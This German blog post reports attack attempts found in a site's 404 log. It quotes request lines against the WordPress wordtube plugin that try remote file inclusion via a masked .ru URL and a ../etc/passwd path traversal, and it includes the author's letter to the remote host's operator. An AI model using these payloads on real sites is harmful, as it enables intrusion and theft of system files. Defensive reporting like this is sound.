WeizenSpr.eu under Attack!

Da denkt man, man kann den Tag mal ruhig ausklingen lassen und dann treffen auf einmal merkwürdige Zugriffsfehler im 404-Log auf:

/2009/schlagzeug-spielender-roboter//wp-content/plugins/wordtube/ wordtube-button.php?wpPATH=http://ra***ka.ru/hk?
/2009/schlagzeug-spielender-roboter//wp-content/plugins/wordtube/ wordtube-button.php?wpPATH=http://www.ra***ka.ru/hk?
/2009/schlagzeug-spielender-roboter///wp-content/plugins/wordtube/ wordtube-button.php?wpPATH=../../../../../../../../etc/passwd
/2009/wie-kommt-der-ton-ins-modem//wp-content/plugins/wordtube/ wordtube-button.php?wpPATH=http://ra***ka.ru/hk?
/2009/wie-kommt-der-ton-ins-modem//wp-content/plugins/wordtube/ wordtube-button.php?wpPATH=http://www.ra***ka.ru/hk?
/2009/wie-kommt-der-ton-ins-modem///wp-content/plugins/wordtube/ wordtube-button.php?wpPATH=../../../../../../../../etc/passwd

Interessant ist in diesem Zusammenhang vor allem die Datei ra***ka.ru/hk, die da versucht wird, als Pfad zu setzen: das sieht doch sehr nach Remote File Injection/Inclusion aus!

Natürlich habe ich den Betreiber der Seite angeschrieben und darum gebeten, die Datei unverzüglich zu entfernen:

Dear sir or madam,

as it appears to me someone has tried to attack my website via a remote file inclusion attack and a file that is located on your server. See http://en.wikipedia.org/wiki/Remote_File_Inclusion for more information.

Therefore I ask you to remove this file immediately and advise you to check the security arrangements of your server if you are a victim.

The URLs that have been tried to access read as follows:
[...]

With kind regards,
Kevin Niehage

Interessanterweise ist diese Attacke bereits seit zwei Jahren im Umlauf. Gibt es immernoch so viele Leute, die sich dagegen nicht gewappnet haben, dass es sich noch lohnt, diesen Angriff auszuführen?

Wart ihr schonmal Ziel eines Online-Angriffs? Wie habt ihr damals reagiert? Würdet ihr - wie ich - den Betreiber der Domain anschreiben?
Attackierte Grüße, Kenny

3 Kommentare » Schreibe einen Kommentar

  1. Auch wenn ich das Redirection-Plugin nicht mehr für Redirections nutzen, für das Loggen der 404-Zugriffsfehler und Bereitstellen als RSS-Feed nutze ich es immernoch... 😉
    Den habe ich einfach abonniert und sehe so sehr einfach, wo es falsche Zugriffe auf die Seite gibt (übrigens auch gut, um fehlerhafte Fremdscripte zu finden, die schlampig beim Generieren der Pfade sind)...

    So habe ich zum Beispiel gestern gesehen, dass der Crawler von WeFind.de Dateinamen in JavaScript zwar versucht zu erreichen, dabei aber den JavaScript-Code nicht interpretiert... so kam er gestern bei mir auf über 200 Fehler - bis ich die IP des Crawlers für WeizenSpr.eu gesperrt hatte.
    Neofonie ist natürlich bereits informiert und sie sind dabei, das Problem zu beheben. 😉

  2. Also wahrscheinlich würde ich garnicht merken, dass da so'n doofer Angriff käme, weil wann schaue ich schon ins Fehlerlog, richtig, nämlich garnicht.

  3. Bisher hatte wir Glück und hoffen auch das es bleibt. Sonst sind wir auf Deine Hilfe angewiesen..., sind da nicht so fit drin, wie du.

Schreibe einen Kommentar

Um Ihnen beim weiteren Kommentieren auf dieser Webseite die erneute Eingabe Ihrer Daten zu ersparen, wird beim Absenden Ihres Kommentars ein Cookie an Ihren Browser gesendet und von diesem gespeichert. Mit dem Absenden eines Kommentars auf dieser Webseite stimmen Sie der Speicherung und Übertragung dieses Cookies explizit zu.

Pflichtfelder sind mit * markiert.